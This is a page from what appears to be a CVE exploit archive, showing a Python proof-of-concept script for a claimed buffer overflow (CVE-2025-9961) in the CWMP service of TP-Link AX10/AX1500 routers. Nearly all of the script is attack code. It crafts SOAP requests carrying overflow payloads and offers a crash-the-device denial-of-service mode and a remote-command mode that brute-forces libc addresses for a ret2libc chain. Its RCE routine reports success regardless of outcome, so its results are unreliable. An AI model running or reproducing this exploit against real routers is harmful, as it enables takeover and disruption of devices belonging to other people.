4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import sys
import argparse
import socket
import struct
import time
from typing import Optional, Tuple, List
from dataclasses import dataclass
from enum import Enum


class ExploitResult(Enum):
    SUCCESS = "success"
    CRASHED = "crashed"
    FAILED = "failed"
    ERROR = "error"


@dataclass
class TargetConfig:
    host: str
    port: int = 7547
    timeout: int = 10


class TPLinkCWMPExploit:
    
    SOAP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope 
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
    <SOAP-ENV:Header>
        <cwmp:ID SOAP-ENV:mustUnderstand="1">1</cwmp:ID>
    </SOAP-ENV:Header>
    <SOAP-ENV:Body>
        <cwmp:SetParameterValues>
            <ParameterList SOAP-ENC:arrayType="cwmp:ParameterValueStruct[1]">
                <ParameterValueStruct>
                    <Name>{param_name}</Name>
                    <Value xsi:type="xsd:string">{payload}</Value>
                </ParameterValueStruct>
            </ParameterList>
            <ParameterKey>exploit</ParameterKey>
        </cwmp:SetParameterValues>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

    HTTP_TEMPLATE = """POST /cwmpWeb/inform HTTP/1.1\r
Host: {host}:{port}\r
Content-Type: text/xml; charset=utf-8\r
Content-Length: {length}\r
SOAPAction: ""\r
\r
{body}"""

    LIBC_SYSTEM_OFFSETS = [
        0x0003ada4,
        0x0003b000,
        0x0003c000,
        0x00040000,
        0x0003a000
    ]
    
    LIBC_BASES_MIPS = [
        0x2aaf0000,
        0x2ab00000,
        0x2ab10000,
        0x2ab20000,
        0x2ab30000,
        0x77f00000,
        0x77e00000
    ]

    def __init__(self, config: TargetConfig):
        self.config = config
    
    def check_alive(self) -> bool:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.config.timeout)
            sock.connect((self.config.host, self.config.port))
            sock.close()
            return True
        except Exception:
            return False
    
    def create_overflow_payload(self, command: str, libc_base: int, system_offset: int) -> bytes:
        padding = b"A" * 512
        
        system_addr = libc_base + system_offset
        
        rop_chain = struct.pack("<I", system_addr)
        rop_chain += struct.pack("<I", 0x41414141)
        rop_chain += command.encode() + b"\x00"
        
        payload = padding + rop_chain
        
        return payload
    
    def create_dos_payload(self, size: int = 1024) -> bytes:
        return b"A" * size
    
    def send_soap_request(self, soap_body: str) -> Tuple[bool, str]:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.config.timeout)
            sock.connect((self.config.host, self.config.port))
            
            http_request = self.HTTP_TEMPLATE.format(
                host=self.config.host,
                port=self.config.port,
                length=len(soap_body),
                body=soap_body
            )
            
            sock.sendall(http_request.encode())
            
            try:
                response = sock.recv(4096).decode(errors='ignore')
            except socket.timeout:
                response = ""
            
            sock.close()
            return True, response
            
        except Exception as e:
            return False, str(e)
    
    def trigger_overflow(self, payload: bytes) -> ExploitResult:
        soap_body = self.SOAP_TEMPLATE.format(
            param_name="Device.ManagementServer.URL",
            payload=payload.decode(errors='replace')
        )
        
        success, response = self.send_soap_request(soap_body)
        
        if not success:
            if "Connection refused" in response or "reset" in response.lower():
                return ExploitResult.CRASHED
            return ExploitResult.ERROR
        
        if "200" in response or "500" in response:
            return ExploitResult.SUCCESS
        
        return ExploitResult.FAILED
    
    def dos_attack(self, payload_sizes: List[int]) -> ExploitResult:
        for size in payload_sizes:
            payload = self.create_dos_payload(size)
            result = self.trigger_overflow(payload)
            
            if result == ExploitResult.CRASHED:
                return ExploitResult.CRASHED
            
            time.sleep(1)
            
            if not self.check_alive():
                return ExploitResult.CRASHED
        
        return ExploitResult.FAILED
    
    def rce_attack(self, command: str) -> ExploitResult:
        for libc_base in self.LIBC_BASES_MIPS:
            for system_offset in self.LIBC_SYSTEM_OFFSETS:
                payload = self.create_overflow_payload(command, libc_base, system_offset)
                result = self.trigger_overflow(payload)
                
                if result == ExploitResult.CRASHED:
                    time.sleep(3)
                    if not self.check_alive():
                        continue
                
                time.sleep(0.5)
        
        return ExploitResult.SUCCESS


def parse_arguments() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="CVE-2025-9961: TP-Link AX10/AX1500 CWMP Buffer Overflow",
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    
    parser.add_argument("target", help="Target IP address")
    parser.add_argument("-p", "--port", type=int, default=7547, help="CWMP port")
    parser.add_argument("-c", "--command", help="Command to execute (RCE mode)")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Socket timeout")
    parser.add_argument("--dos", action="store_true", help="DoS mode only")
    parser.add_argument("--check-only", action="store_true", help="Only check if CWMP is open")
    
    return parser.parse_args()


def main() -> int:
    args = parse_arguments()
    
    config = TargetConfig(
        host=args.target,
        port=args.port,
        timeout=args.timeout
    )
    
    exploit = TPLinkCWMPExploit(config)
    
    print(f"\n[*] Target: {config.host}:{config.port}")
    print(f"[*] CVE-2025-9961: TP-Link CWMP Buffer Overflow\n")
    
    if not exploit.check_alive():
        print("[-] CWMP port is not reachable")
        print("[*] Note: CWMP runs on port 7547 and may need ISP/ACS access")
        return 1
    
    print("[+] CWMP port is open")
    
    if args.check_only:
        print("[*] Check only mode - target has CWMP exposed")
        return 0
    
    if args.dos:
        print("[*] Running DoS attack...")
        payload_sizes = [512, 1024, 2048, 4096]
        
        for size in payload_sizes:
            print(f"[*] Sending payload size: {size}")
            payload = exploit.create_dos_payload(size)
            result = exploit.trigger_overflow(payload)
            
            time.sleep(2)
            
            if not exploit.check_alive():
                print(f"\n[!] TARGET CRASHED - DoS successful at size {size}")
                return 0
        
        print("[?] Target may still be alive")
        return 2
    
    if args.command:
        print(f"[*] Attempting RCE with command: {args.command}")
        print("[*] This uses ret2libc with ASLR brute force")
        print("[*] May require multiple attempts...")
        
        result = exploit.rce_attack(args.command)
        
        print(f"\n[+] Attack completed - check if command executed")
        return 0
    
    print("[*] No mode specified. Use --dos or -c <command>")
    return 1


if __name__ == "__main__":
    sys.exit(main())